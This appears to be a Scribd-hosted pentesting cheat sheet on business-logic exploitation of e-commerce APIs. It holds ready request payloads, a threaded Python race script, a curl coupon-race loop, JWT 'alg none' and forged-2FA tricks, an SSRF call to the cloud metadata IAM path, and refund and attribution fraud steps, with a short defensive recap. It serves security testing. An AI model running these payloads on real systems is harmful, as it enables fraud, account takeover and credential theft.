0% found this document useful (0 votes)

6 views

itwhatitis

The document provides a comprehensive guide on business logic vulnerabilities in web APIs and applications, detailing various categories of exploitation such as cart manipulation, coupon abuse, payment system exploits, and more. Each section outlines discovery methods, input examples, exploit flows, and potential impacts of these vulnerabilities. It also includes defensive measures to mitigate risks associated with these exploits.

Uploaded by

tnyange909

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

6 views

itwhatitis

Uploaded by

tnyange909

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 7

🔐Exploitation

Business Logic Vulnerabilities: Comprehensive

Guide
A categorized breakdown of business logic flaws in modern web APIs and applications
with deep coverage of discovery, input tampering, and real-world exploitation.

🔁 1. Cart & Inventory Manipulation

Definition: Exploiting flaws in logic that handles product pricing, quantity, and availability.

🔸 Categories:
• CART-001: Negative Item Quantity
• CART-002: Price Override via Client Input
• CART-003: Bulk Discount Exploit
• CART-004: Inventory Overflow
• CART-005: Gift Wrapping or Add-on Tampering

🔍 Discovery:
• Intercept requests to /cart, /add-to-cart, /inventory/update

• Look for:
• Modifiable fields: quantity, price, discount_id

• Conditional fields hidden in client (customizations, addon_cost)

🔢 Input Structures:
POST /api/cart/add
{
"product_id": "123",
"quantity": -5,
"custom_price": 1.00,
"gift_wrap": "true"
}

🚨 Exploit Flows:
• Race Condition Additions (Negative Quantity):
import threading, requests
def attack(): requests.post("https://target.com/api/cart/add",
json={"product_id": "123", "quantity": -1})
for _ in range(50): threading.Thread(target=attack).start()
🧨 Impact:
• Product refunded for nonexistent purchases
• Inventory records desynced
• Exploit for gift-wrap or bonus item addition without charge

🎟 2. Coupon & Discount Abuse

Definition: Abusing coupon or promo validation logic to get unintended benefits.

🔸 Categories:
• DISC-001: Coupon Reuse
• DISC-002: Race Condition Coupons
• DISC-003: Expired Coupon Reuse
• DISC-004: Stackable Discounts
• DISC-005: Gift Card Replay

🔍 Discovery:
• APIs like /coupon/apply, /promo/validate

• Fuzz code, discount_type, gift_card_balance

🔢 Input Example:
POST /api/coupon/apply
Headers: {"X-Request-ID": "RACE-456"}
{
"code": "WELCOME100"
}

🧨 Exploit Flow:
• Apply same coupon multiple times via race:
for i in {1..20}; do
curl -X POST -H "X-Request-ID: $i" -d '{"code": "SAVE50"}'
https://target.com/api/coupon/apply &
done

🧨 Impact:
• Double/triple discount
• Free gift cards, financial loss
• Gift card replays after refund
💳 3. Payment System Exploits
Definition: Abuse of price, tax, or order total logic during checkout/payment flow.

🔸 Categories:
• PAY-001: Price Tampering
• PAY-002: Partial Payment Abuse
• PAY-003: Negative Tax Rate
• PAY-004: Refund Abuse
• PAY-005: Multi-currency Rounding Abuse

🔍 Discovery:
• Endpoints: /checkout, /payment/initiate, /payment/confirm

• Fuzz order_total, tax_rate, currency

🔢 Input:
PATCH /api/checkout
{
"order_total": 0.01,
"currency": "USD"
}

🧨 Real Exploits:
• Refund without return:
POST /api/refund
{
"order_id": "456", "reason": "item damaged"
}

• Convert rounding bugs into profit (e.g., JPY <-> USD)

🔐 4. Authentication & Authorization Bypass

Definition: Bypass or downgrade identity verification mechanisms.

🔸 Categories:
• AUTH-001: OTP/2FA Brute Force
• AUTH-002: JWT Manipulation
• AUTH-003: Role Escalation
• AUTH-004: Session Fixation

🔍 Discovery:
• APIs: /login, /verify, /token/refresh
• Fuzz headers: Authorization, X-User-Role, cookies

🔢 Input:
POST /api/2fa/verify
{
"otp": "123456"
}

🧨 Exploit:
• JWT Mod:
{
"alg": "none", "user": "admin"
}

• OTP bypass:
Modify 2FA validation result in Burp:
{"success": true, "token": "admin-session"}

🪙 5. Loyalty & Rewards Program Abuse

Definition: Exploiting the logic of point-based reward systems.

🔸 Categories:
• LOY-001: Point Inflation
• LOY-002: Tier Promotion via Replay
• LOY-003: Redeem Loop
• LOY-004: Expiry Date Bypass

🔍 Discovery:
• APIs: /loyalty/add, /rewards/redeem, /user/tier

• Fuzz: points, redeem_code, tier, timestamp

🔢 Input:
PUT /api/loyalty/points
{
"user_id": "attacker",
"action": "add",
"points": 999999
}

🧨 Exploits:
• Abuse APIs to:
• Redeem points after refund
• Promote to VIP status
• Inject points repeatedly

🚚 6. Shipping & Delivery Exploits

Definition: Manipulating shipment eligibility or address validation logic.

🔸 Categories:
• SHIP-001: Free Shipping Abuse
• SHIP-002: Address Manipulation (PO Box bypass)
• SHIP-003: Warehouse/Region Spoofing
• SHIP-004: Cross-border Shipping Trick

🔍 Discovery:
• Endpoints: /shipping/calculate, /address/validate

• Fuzz: country, zipcode, region, promo_zone

🔢 Input:
POST /api/shipping/calculate
{
"country": "FREE_SHIPPING_ZONE"
}

📦 7. Order Fulfillment Tampering

Definition: Altering the order process flow post-payment.

🔸 Categories:
• FULL-001: Status Update Abuse
• FULL-002: Pre-shipment Manipulation
• FULL-003: Fake Shipment Notifications
• FULL-004: Admin API Spoofing

🔍 Discovery:
• Look for /order/status, /fulfillment/update, X-Admin headers

• Look for insecure role validation

🔢 Input:
POST /api/orders/123/status
Headers: {"X-Admin": "true"}
{
"status": "shipped"
}
🧨 Impact:
• Force order into "shipped" state
• Fraudulent order confirmations

🧩 8. API Design Exploits

Definition: Flaws in how API endpoints accept, trust, or structure requests.

🔸 Categories:
• API-001: Mass Assignment
• API-002: Unpublished Endpoint Discovery (Shadow API)
• API-003: Batch Injection
• API-004: Internal Endpoint Exposure

🔢 Exploit:
POST /api/batch
{
"ops": [
{"method": "DELETE", "path": "/users/789"},
{"method": "PATCH", "path": "/admin/settings"}
]
}

🎯 9. Analytics & Attribution Fraud

Definition: Manipulating marketing attribution systems.

🔸 Categories:
• FRAUD-001: UTM Referrer Spoofing
• FRAUD-002: Fake Conversions
• FRAUD-003: Pixel Injection

🔍 Discovery:
• Check UTM usage, pixel endpoints, conversion APIs

🔢 Exploit:
GET /product/123?utm_source=fake_affiliate
X-Forwarded-For: 1.2.3.4
🧠 10. Advanced & Chained Exploits
🔸 Categories:
• ADV-001: SSRF to Cloud Metadata Access
• ADV-002: Webhook Hijack
• ADV-003: Cache Poisoning
• ADV-004: Logic Bomb via Webhook + Inventory Race

🚨 SSRF + IAM Keys Example:

POST /api/generate-pdf
{
"url": "http://169.254.169.254/latest/meta-data/iam/"
}

🧪 Exploitation Methodology (Deep Dive)

Stage Tools Goal
Discovery Burp, Postman, ZAP Fuzz endpoints, find logic flaws
Testing Custom scripts Parameter tampering, timing/race
Exploitation Python, curl, intruder Chain vulnerabilities
Persistence Webhooks, admin abuse Maintain control or repeat exploit

🛡️ Defensive
✅
•
Countermeasures (Recap & Expand)
Server-Side Enforcement: Never trust client values like price, quantity
• ✅ Rate Limiting & Token Binding: Prevent brute-force and race attacks
• ✅ Strong Authorization: Role validation for every action
• ✅ Audit Logging: Trace abnormal flows and rollback logic
"

t1+SEO+Lp+Anchal Singhal Dm-49
100% (1)
t1+SEO+Lp+Anchal Singhal Dm-49
13 pages
Bug Bounty Playbook V2 PDF
80% (10)
Bug Bounty Playbook V2 PDF
250 pages
BB Challenge Sample
60% (5)
BB Challenge Sample
28 pages
API Pentesting Mindmap ATTACK
No ratings yet
API Pentesting Mindmap ATTACK
1 page
Owasp Api Security Top 10 Cheat Sheet A4
No ratings yet
Owasp Api Security Top 10 Cheat Sheet A4
3 pages
API Security Testing PDF
100% (1)
API Security Testing PDF
24 pages
Single Aisle Technical Training Manual Maintenance Course - M35 Line Mechanics (CFM56-5B/ME) APU
100% (1)
Single Aisle Technical Training Manual Maintenance Course - M35 Line Mechanics (CFM56-5B/ME) APU
208 pages
Business_Logic_Exploitation_Cheat_Sheet_Clean
No ratings yet
Business_Logic_Exploitation_Cheat_Sheet_Clean
6 pages
Here are the most critical
No ratings yet
Here are the most critical
3 pages
Bussiness Logic Error Cheatsheet
No ratings yet
Bussiness Logic Error Cheatsheet
5 pages
API Security
No ratings yet
API Security
10 pages
API Pentesting Mindmap While Trying To Attack
No ratings yet
API Pentesting Mindmap While Trying To Attack
1 page
memory
No ratings yet
memory
5 pages
42crunch OWASP 2023 Datasheet 4p v1
No ratings yet
42crunch OWASP 2023 Datasheet 4p v1
4 pages
Managing Risk in Open Banking
No ratings yet
Managing Risk in Open Banking
30 pages
mt1
No ratings yet
mt1
13 pages
Business Logic Bugs task 14
No ratings yet
Business Logic Bugs task 14
15 pages
Owasp Api Security Top 10 Cheat Sheet A4
No ratings yet
Owasp Api Security Top 10 Cheat Sheet A4
4 pages
Api Design Course
No ratings yet
Api Design Course
11 pages
Owasp API Security Top 10 Cheat Sheet Tabloid
No ratings yet
Owasp API Security Top 10 Cheat Sheet Tabloid
1 page
Hacking and Defending APIs 1.1
No ratings yet
Hacking and Defending APIs 1.1
31 pages
Security Checklist For Developers
No ratings yet
Security Checklist For Developers
4 pages
trading_platform_vulnerabilities
No ratings yet
trading_platform_vulnerabilities
5 pages
EC
No ratings yet
EC
24 pages
API Security Testing
No ratings yet
API Security Testing
1 page
API Scenario Checklist-Old
No ratings yet
API Scenario Checklist-Old
14 pages
Cross Site Scripting Lab
No ratings yet
Cross Site Scripting Lab
3 pages
#1 API Risk - Mitigation Strategy
No ratings yet
#1 API Risk - Mitigation Strategy
10 pages
Template - GA4 Ecommerce Implementation Developer Specification
No ratings yet
Template - GA4 Ecommerce Implementation Developer Specification
5 pages
API Testing Checklist
No ratings yet
API Testing Checklist
7 pages
API Security Best Practices
No ratings yet
API Security Best Practices
39 pages
API Security-Developers Checklist-Hacktivists University
No ratings yet
API Security-Developers Checklist-Hacktivists University
13 pages
OWASP - API Testing
No ratings yet
OWASP - API Testing
17 pages
PayPal APIs Up and Running Second Edition Matthew A. Russell instant download
No ratings yet
PayPal APIs Up and Running Second Edition Matthew A. Russell instant download
56 pages
Web Logic Vulnerability
No ratings yet
Web Logic Vulnerability
57 pages
Simpl Pay in 3: API Integration Sequence Diagram 2 API Integration Explanation 3 API Specifications 4
No ratings yet
Simpl Pay in 3: API Integration Sequence Diagram 2 API Integration Explanation 3 API Specifications 4
23 pages
ELECRONIC COMMERCE THREATS
No ratings yet
ELECRONIC COMMERCE THREATS
1 page
Attacking Secondary Contexts in Web Applications
No ratings yet
Attacking Secondary Contexts in Web Applications
32 pages
10 API Nightmares That Will Destroy Your App
No ratings yet
10 API Nightmares That Will Destroy Your App
5 pages
Prof_Mannan_Assignment_v1_0
No ratings yet
Prof_Mannan_Assignment_v1_0
3 pages
OWASP Top 10 API Security Risks - 2023
No ratings yet
OWASP Top 10 API Security Risks - 2023
39 pages
Bug Bounty Bootcamp
No ratings yet
Bug Bounty Bootcamp
2 pages
Bazaar E Commerce Project Guideline Book v2
No ratings yet
Bazaar E Commerce Project Guideline Book v2
6 pages
Ethical Hacker - Test Case
No ratings yet
Ethical Hacker - Test Case
5 pages
Website Attack Vectors Presentation
No ratings yet
Website Attack Vectors Presentation
2 pages
D1 COMMSEC - API Security in the Age of Microservices - Ali Abdollahi
No ratings yet
D1 COMMSEC - API Security in the Age of Microservices - Ali Abdollahi
32 pages
50 Common Logical Vulnerabilitiesaaa
No ratings yet
50 Common Logical Vulnerabilitiesaaa
4 pages
API Security
No ratings yet
API Security
1 page
ShopZ E-Commerce Application
No ratings yet
ShopZ E-Commerce Application
12 pages
Why Every Developer Should Understand API Security in 2025
No ratings yet
Why Every Developer Should Understand API Security in 2025
5 pages
component-level-prd
No ratings yet
component-level-prd
40 pages
Example Api Documentation by Mindtrans
No ratings yet
Example Api Documentation by Mindtrans
60 pages
Garment Shop Management System
No ratings yet
Garment Shop Management System
20 pages
E-Commerce Project
No ratings yet
E-Commerce Project
4 pages
Web React JS Project
No ratings yet
Web React JS Project
14 pages
hackanythingfor-blogspot-com-2020-07-api-testing-checklist-html
No ratings yet
hackanythingfor-blogspot-com-2020-07-api-testing-checklist-html
5 pages
webapplicationsecurity
No ratings yet
webapplicationsecurity
30 pages
Tax Billing
No ratings yet
Tax Billing
6 pages
User Auth_ Dashboard and Notification-4 (1)
No ratings yet
User Auth_ Dashboard and Notification-4 (1)
5 pages
100 Vulnerabilities
No ratings yet
100 Vulnerabilities
4 pages
Mastering OAuth 2.0: Create powerful applications to interact with popular service providers such as Facebook, Google, Twitter, and more by leveraging the OAuth 2.0 Authorization Framework
From Everand
Mastering OAuth 2.0: Create powerful applications to interact with popular service providers such as Facebook, Google, Twitter, and more by leveraging the OAuth 2.0 Authorization Framework
Charles Bihis
4/5 (2)
Hashicorp Certified Vault Associate Certification Case Based Practice Questions - Latest Edition
From Everand
Hashicorp Certified Vault Associate Certification Case Based Practice Questions - Latest Edition
Exam OG
No ratings yet
Salesforce Certified Marketing Cloud Consultant Practice Questions And Exam Tests Marketing Cloud Consultant Exam Guidebook And Updated Questions
From Everand
Salesforce Certified Marketing Cloud Consultant Practice Questions And Exam Tests Marketing Cloud Consultant Exam Guidebook And Updated Questions
Idea Link
No ratings yet
database
No ratings yet
database
13 pages
Https Admin Shopify Com
No ratings yet
Https Admin Shopify Com
1 page
proposal
No ratings yet
proposal
3 pages
procudures
No ratings yet
procudures
3 pages
realnetworkandroid
No ratings yet
realnetworkandroid
4 pages
digital
No ratings yet
digital
4 pages
realnow
No ratings yet
realnow
6 pages
project
No ratings yet
project
9 pages
group3 zimamoto
No ratings yet
group3 zimamoto
14 pages
Tutorial Sheet #1
No ratings yet
Tutorial Sheet #1
3 pages
Reading_Assignment
No ratings yet
Reading_Assignment
2 pages
w1
No ratings yet
w1
8 pages
Project
No ratings yet
Project
6 pages
vulnability assigment
No ratings yet
vulnability assigment
3 pages
[email protected] report
No ratings yet
[email protected] report
32 pages
wireless group6 work
No ratings yet
wireless group6 work
8 pages
hacking-university-mobile-phone-amp-app-hacking-amp-complete-beginners-guide-to-learn-linux-hacking-mobile-devices-tablets-game-consoles-apps-amp-precisely-hacking-freedom-and-data-driven-book-5
No ratings yet
hacking-university-mobile-phone-amp-app-hacking-amp-complete-beginners-guide-to-learn-linux-hacking-mobile-devices-tablets-game-consoles-apps-amp-precisely-hacking-freedom-and-data-driven-book-5
116 pages
4 LINSSID
No ratings yet
4 LINSSID
19 pages
Block Caving - QueensMineDesignWiki
No ratings yet
Block Caving - QueensMineDesignWiki
12 pages
Role of Maastishkya in Netra Rogas
No ratings yet
Role of Maastishkya in Netra Rogas
3 pages
INORGANIC_lab.01
No ratings yet
INORGANIC_lab.01
107 pages
Conditional Sentences Civil Engineering
No ratings yet
Conditional Sentences Civil Engineering
42 pages
1st Quarter, 1st Sem - g11 Stem e - Literature, Oc
No ratings yet
1st Quarter, 1st Sem - g11 Stem e - Literature, Oc
3 pages
2018 BSECE Curriculum
No ratings yet
2018 BSECE Curriculum
5 pages
Inventory of Curriculum Approach
No ratings yet
Inventory of Curriculum Approach
4 pages
Matrix Structural Analysis Second Edition William Mcguire download
100% (1)
Matrix Structural Analysis Second Edition William Mcguire download
62 pages
Mittal Plate Fabrication Guide
No ratings yet
Mittal Plate Fabrication Guide
118 pages
Portfolio: Bangalore International School
No ratings yet
Portfolio: Bangalore International School
38 pages
Epson
No ratings yet
Epson
3 pages
Classic French Croissants 101 Guide Final
No ratings yet
Classic French Croissants 101 Guide Final
15 pages
BIOLOGY CSEC Lecture 1
100% (1)
BIOLOGY CSEC Lecture 1
43 pages
Supply Chain Modeling Faculty Mentor: Dr. Rameshwar Dubey Taruna Singh PRN: 20020741059
No ratings yet
Supply Chain Modeling Faculty Mentor: Dr. Rameshwar Dubey Taruna Singh PRN: 20020741059
8 pages
Printing WPA1210C11
No ratings yet
Printing WPA1210C11
1 page
E-Learning Platform: Indira Gandhi National Open University
100% (1)
E-Learning Platform: Indira Gandhi National Open University
26 pages
3.1 Introduction To Power Supply
No ratings yet
3.1 Introduction To Power Supply
33 pages
Factsheet - FSC CA - FSC &amp LEED v4 - English - March2017
No ratings yet
Factsheet - FSC CA - FSC &amp LEED v4 - English - March2017
2 pages
EC Geography Grade 12 June 2024 QP and Memo
No ratings yet
EC Geography Grade 12 June 2024 QP and Memo
35 pages
D D D D D D D D D: Description/ordering Information
No ratings yet
D D D D D D D D D: Description/ordering Information
19 pages
Ragheb-Neutron Cross Sections-2011 PDF
No ratings yet
Ragheb-Neutron Cross Sections-2011 PDF
26 pages
Colm Corcoran Booklet IXD PDF
No ratings yet
Colm Corcoran Booklet IXD PDF
24 pages
Instant download Financial Markets and Institutions Tenth Global Edition Frederic S. Mishkin pdf all chapter
100% (13)
Instant download Financial Markets and Institutions Tenth Global Edition Frederic S. Mishkin pdf all chapter
60 pages
IJRFCAD
No ratings yet
IJRFCAD
10 pages
Analisis STP Pada PT Jiwasraya
No ratings yet
Analisis STP Pada PT Jiwasraya
13 pages
Ont.201711107 1117
No ratings yet
Ont.201711107 1117
12 pages
Amazing English 3 - Writing Booklet Key
No ratings yet
Amazing English 3 - Writing Booklet Key
3 pages

itwhatitis

Uploaded by

itwhatitis

Uploaded by

🔐Exploitation

Business Logic Vulnerabilities: Comprehensive

🔁 1. Cart & Inventory Manipulation

• Conditional fields hidden in client (customizations, addon_cost)

🎟 2. Coupon & Discount Abuse

• Fuzz code, discount_type, gift_card_balance

• Fuzz order_total, tax_rate, currency

• Convert rounding bugs into profit (e.g., JPY <-> USD)

🔐 4. Authentication & Authorization Bypass

🪙 5. Loyalty & Rewards Program Abuse

• Fuzz: points, redeem_code, tier, timestamp

🚚 6. Shipping & Delivery Exploits

• Fuzz: country, zipcode, region, promo_zone

📦 7. Order Fulfillment Tampering

• Look for insecure role validation

🧩 8. API Design Exploits

🎯 9. Analytics & Attribution Fraud

🚨 SSRF + IAM Keys Example:

🧪 Exploitation Methodology (Deep Dive)

You might also like